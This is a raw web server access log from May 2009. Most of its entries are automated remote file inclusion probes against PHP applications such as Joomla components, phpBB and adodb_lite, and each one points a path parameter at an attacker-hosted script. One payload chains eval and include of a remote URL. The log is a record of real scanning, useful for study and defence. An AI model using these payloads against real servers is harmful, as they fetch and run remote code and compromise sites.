193.239.4.3 - - [31/May/2009:01:40:52 -0400] "GET /logs/error_log.Q109030300/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
222.122.160.145 - - [31/May/2009:01:41:30 -0400] "GET /logs/access_log.Q109052300%20%20/mainbody.php?option=com_custompages&cpage=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:43:01 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:43:03 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:01:43:11 -0400] "GET /logs/errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:01:43:11 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:01:43:11 -0400] "GET /errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:43:52 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:43:53 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:01:45:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [31/May/2009:01:45:37 -0400] "GET /home.php?x=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:01:45:37 -0400] "GET /logs/home.php?x=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:01:46:03 -0400] "GET /home.php?x=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:01:46:03 -0400] "GET /logs/home.php?x=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
74.6.8.108 - - [31/May/2009:01:46:11 -0400] "GET /logs/error_log.Q108122000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.108 - - [31/May/2009:01:48:54 -0400] "GET /logs/error_log.Q107072900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [31/May/2009:01:50:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.237.146.58 - - [31/May/2009:01:51:19 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:51:19 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.173.130.41 - - [31/May/2009:01:51:35 -0400] "GET /logs/access_log.Q109051100%20%20//include/write.php?dir=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:53:08 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:53:08 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:01:53:18 -0400] "GET /phphtml.php?htmlclass_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:01:53:18 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
62.149.0.248 - - [31/May/2009:01:53:19 -0400] "GET /logs/error_log.Q108052600//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:53:20 -0400] "GET /logs/error_log.Q108052600//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
83.103.72.130 - - [31/May/2009:01:53:21 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:01:55:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [31/May/2009:01:55:47 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:01:55:47 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:01:55:47 -0400] "GET /logs/access_log.Q109051000//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:01:56:00 -0400] "GET /logs/access_log.Q109051500//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:02:00:03 -0400] "GET /logs/access_log.Q108070700%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
66.249.67.16 - - [31/May/2009:02:00:06 -0400] "GET /logs/error_log.Q107062800 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.103.72.130 - - [31/May/2009:02:00:17 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:02:00:17 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:02:00:17 -0400] "GET /logs/access_log.Q108081500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:02:00:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [31/May/2009:02:00:45 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
85.119.158.133 - - [31/May/2009:02:00:54 -0400] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
85.119.158.133 - - [31/May/2009:02:00:54 -0400] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
216.15.161.2 - - [31/May/2009:02:03:47 -0400] "GET /logs/errors.php?error=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
216.15.161.2 - - [31/May/2009:02:03:47 -0400] "GET /errors.php?error=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.103.72.130 - - [31/May/2009:02:04:07 -0400] "GET /logs/access_log.Q108081500%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
78.31.64.178 - - [31/May/2009:02:06:06 -0400] "GET /logs/access_log.Q109050900//index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:02:06:06 -0400] "GET /logs/access_log.Q109050900//index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:02:06:06 -0400] "GET //index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:02:06:06 -0400] "GET //index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:02:06:07 -0400] "GET /logs//index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:02:06:07 -0400] "GET /logs//index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
116.36.213.166 - - [31/May/2009:02:06:10 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:06:38 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:07:01 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:07:22 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:07:31 -0400] "GET /logs/access_log.Q109051600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:08:02 -0400] "GET /logs/access_log.Q109051600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
212.227.57.13 - - [31/May/2009:02:08:31 -0400] "GET /http://83.241.172.8/idx??? HTTP/1.1" 404 221 "-" "libwww-perl/5.76"
64.6.231.215 - - [31/May/2009:02:08:42 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:02:08:42 -0400] "GET /logs/access_log.Q109051600/components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 268 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:02:08:42 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:02:08:43 -0400] "GET /logs/access_log.Q109050700/components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 268 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:02:08:47 -0400] "GET /logs/access_log.Q109052200/components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 268 "-" "libwww-perl/5.65"
209.200.8.89 - - [31/May/2009:02:09:14 -0400] "GET /logs/index.php?seite=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
209.200.8.89 - - [31/May/2009:02:09:19 -0400] "GET /index.php?seite=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
85.17.162.28 - - [31/May/2009:02:09:25 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:09:25 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:09:25 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:09:47 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:09:47 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:09:47 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:09:52 -0400] "GET /logs/access_log.Q109051600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:10:06 -0400] "GET /logs/access_log.Q109051600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
210.100.220.126 - - [31/May/2009:02:11:04 -0400] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://r3mu.by.ru/Shells/phpcmd.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:02:11:06 -0400] "GET //?_zb_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:02:11:06 -0400] "GET /logs//?_zb_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:02:11:06 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:02:11:07 -0400] "GET /logs/access_log.Q109052200//?_zb_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:02:11:08 -0400] "GET //?_zb_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:02:11:08 -0400] "GET /logs//?_zb_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:02:11:08 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:02:11:08 -0400] "GET /logs/access_log.Q109052200//?_zb_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:02:12:26 -0400] "GET /logs/access_log.Q109051500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.200.8.89 - - [31/May/2009:02:12:35 -0400] "GET //modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.172.225.50 - - [31/May/2009:02:12:49 -0400] "GET /http://83.241.172.8/idx??? HTTP/1.1" 404 221 "-" "libwww-perl/5.803"
217.147.29.190 - - [31/May/2009:02:13:00 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.808"
217.147.29.190 - - [31/May/2009:02:13:00 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.808"
217.147.29.190 - - [31/May/2009:02:13:01 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.808"
209.59.12.99 - - [31/May/2009:02:13:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.194.204.129 - - [31/May/2009:02:13:14 -0400] "GET /logs/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:13:14 -0400] "GET /logs/access_log.Q109051000/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:13:14 -0400] "GET /administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:02:13:16 -0400] "GET /logs//modules/My_eGallery/public/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:02:13:16 -0400] "GET //modules/My_eGallery/public/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:02:13:16 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 263 "-" "libwww-perl/5.65"
203.194.204.129 - - [31/May/2009:02:13:23 -0400] "GET /logs/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:13:23 -0400] "GET /logs/access_log.Q109051000/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:13:23 -0400] "GET /administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:13:32 -0400] "GET /logs/access_log.Q109051000%20%20/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:13:32 -0400] "GET /logs/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:13:32 -0400] "GET /administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:02:13:43 -0400] "GET /logs/access_log.Q109042200//modules/My_eGallery/public/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 263 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:02:13:58 -0400] "GET /logs/access_log.Q109051800%20%20//?_zb_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:02:13:58 -0400] "GET /logs/access_log.Q109052200%20%20//?_zb_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:02:14:19 -0400] "GET /logs/error_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.808"
209.200.8.89 - - [31/May/2009:02:14:21 -0400] "GET /logs//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
64.6.231.215 - - [31/May/2009:02:14:48 -0400] "GET /logs/access_log.Q109051800%20%20//?_zb_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:02:14:48 -0400] "GET /logs/access_log.Q109052200%20%20//?_zb_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.199.250.194 - - [31/May/2009:02:15:03 -0400] "GET /logs/error_log.Q108102800//components/com_simpleboard/image_upload.php?sbp=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.813"
66.199.250.194 - - [31/May/2009:02:15:03 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.813"
66.199.250.194 - - [31/May/2009:02:15:03 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.813"
203.194.204.129 - - [31/May/2009:02:15:57 -0400] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:15:57 -0400] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:15:57 -0400] "GET /logs/access_log.Q109051000/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:16:13 -0400] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:16:13 -0400] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:16:13 -0400] "GET /logs/access_log.Q109051000%20%20/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:16:27 -0400] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:16:27 -0400] "GET /logs/access_log.Q109051000/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
